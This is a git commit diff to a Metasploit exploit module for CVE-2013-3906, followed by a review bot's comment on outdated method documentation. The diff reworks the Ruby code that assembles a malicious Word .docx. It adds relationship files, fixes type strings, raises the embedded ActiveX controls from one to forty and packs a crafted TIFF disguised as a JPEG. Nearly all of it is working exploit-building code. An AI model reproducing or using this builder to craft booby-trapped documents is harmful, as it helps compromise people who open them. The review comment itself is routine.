bug/bundler_fix
sinn3r 2013-11-20 17:11:13 -06:00
parent 94e13a0b8a
commit e13e457d8f
1 changed files with 84 additions and 38 deletions


@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
'ax:persistence' => "persistStorage",
'r:id' => rid,
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
'xmlns:r' => @schema
}
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@ -269,6 +269,22 @@ class Metasploit3 < Msf::Exploit::Remote
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
rels = []
rels << doc_xml
rels << doc_props
{
:fname => "_rels/.rels",
# The .rels generates the same format like make_doc_xml_reals, we'll just use that
:data => make_doc_xml_reals(rels.flatten)
}
end
#
# Creates a document.xml file
# @param pre_defs [Array]
@ -276,7 +292,7 @@ class Metasploit3 < Msf::Exploit::Remote
# @param tiff_file [Array]
# @return [String] XML document
#
def init_doc_xml(pre_defs, activex, tiff_file)
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:rid] }
@ -294,7 +310,7 @@ class Metasploit3 < Msf::Exploit::Remote
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
@ -347,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote
xml.cNvGraphicFramePr
xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>"http://schemas.openxmlformats.org/officeDocument/2006/relationships"})
xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>@schema})
end
end
end
@ -362,7 +378,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
builder.to_xml
{
:rid => "rId#{last_rid.to_s}",
:type => "#{@schema}/officeDocument",
:fname => "word/document.xml",
:xml => builder.to_xml
}
end
#
@ -415,25 +436,35 @@ class Metasploit3 < Msf::Exploit::Remote
#
# Pre-define some items that already exist in the data directory
# This is more for the document.xml.rels file
# Pre-define some items that will be used in .rels
#
def init_pre_defs
last_rid = 0
def init_doc_props(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
pre_defs = []
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}styles", :fname => "word/styles.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}settings", :fname => "word/settings.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}webSettings", :fname => "word/webSettings.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}theme", :fname => "word/theme/theme1.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart1.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart2.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart3.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart4.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart5.xml"}
pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart", :fname => "word/charts/chart6.xml"}
return last_rid, items
end
return last_rid, pre_defs
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {:rid => (last_rid += 1), :type => "#{@schema}/styles", :fname => "word/styles.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/settings", :fname => "word/settings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/theme", :fname => "word/theme/theme1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart1.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart2.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart3.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart4.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart5.xml"}
items << {:rid => (last_rid += 1), :type => "#{@schema}/chart", :fname => "word/charts/chart6.xml"}
return last_rid, items
end
@ -443,7 +474,7 @@ class Metasploit3 < Msf::Exploit::Remote
def init_activex_files(last_rid)
activex = []
1.times do |i|
40.times do |i|
id = last_rid + i
last_rid = id
rid = "rId#{id.to_s}"
@ -464,14 +495,15 @@ class Metasploit3 < Msf::Exploit::Remote
}
ct = "application/vnd.ms-office.activeX+xml"
type = "#{@schema}control"
type = "#{@schema}/control"
activex << {
:rid => rid,
:bin => bin,
:xml => xml,
:rels => rels,
:content_type => ct
:content_type => ct,
:type => type
}
end
@ -498,12 +530,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Creates the tiff file
#
def init_tiff_file(last_rid)
{
:rid => "rId#{(last_rid + 1).to_s}",
tiff_data = {
:rid => "rId#{(last_rid += 1).to_s}",
:fname => "word/media/image1.jpeg",
:data => make_tiff,
:type => "#{@schema}image"
:type => "#{@schema}/image"
}
return last_rid, tiff_data
end
#
@ -512,11 +546,11 @@ class Metasploit3 < Msf::Exploit::Remote
def init_doc_xml_reals_file(pre_defs, activex, tiff)
reals = []
pre_defs.each do |obj|
reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
end
activex.each do |obj|
reals << {:id => obj[:rid], :tyoe => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
end
reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
@ -542,12 +576,15 @@ class Metasploit3 < Msf::Exploit::Remote
#
def make_docx(path)
print_status("Initializing files...")
last_rid, pre_defs = init_pre_defs
last_rid, activex = init_activex_files(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
tiff_file = init_tiff_file(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(pre_defs, activex, tiff_file)
doc_xml = init_doc_xml(pre_defs, activex, tiff_file)
last_rid = 1
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
ct_xml_file = init_contenttype_xml_file(activex)
last_rid, tiff_file = init_tiff_file(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
@ -557,8 +594,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Packing directory: #{p}")
zip.add_file(p)
else
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
@ -583,6 +623,12 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
@ -590,7 +636,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
docx = make_docx(path)
file_create(docx)
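Review bot: The YARD comment above `init_doc_xml` no longer matches the method. The new signature takes `last_rid` as its first argument, and the method now ends in a hash with `:rid`, `:type`, `:fname` and `:xml` instead of the bare `builder.to_xml` string, yet the comment still ends with `@return [String] XML document` and has no entry for the new parameter. I would add `# @param last_rid [Integer]` (type inferred from `last_rid = 1` in `make_docx`) and change the return tag to `# @return [Hash] :rid, :type, :fname and :xml for word/document.xml`. The same gap exists on `init_tiff_file`, which now returns the pair `last_rid, tiff_data` under a comment that only says "Creates the tiff file"; a `@return [Array]` line naming both elements would make the call in `make_docx` easier to follow. The body of `init_doc_xml` is spread over several hunks and is not fully visible here, and the old/new side of each line is inferred from the hunk line counts on this rendered page.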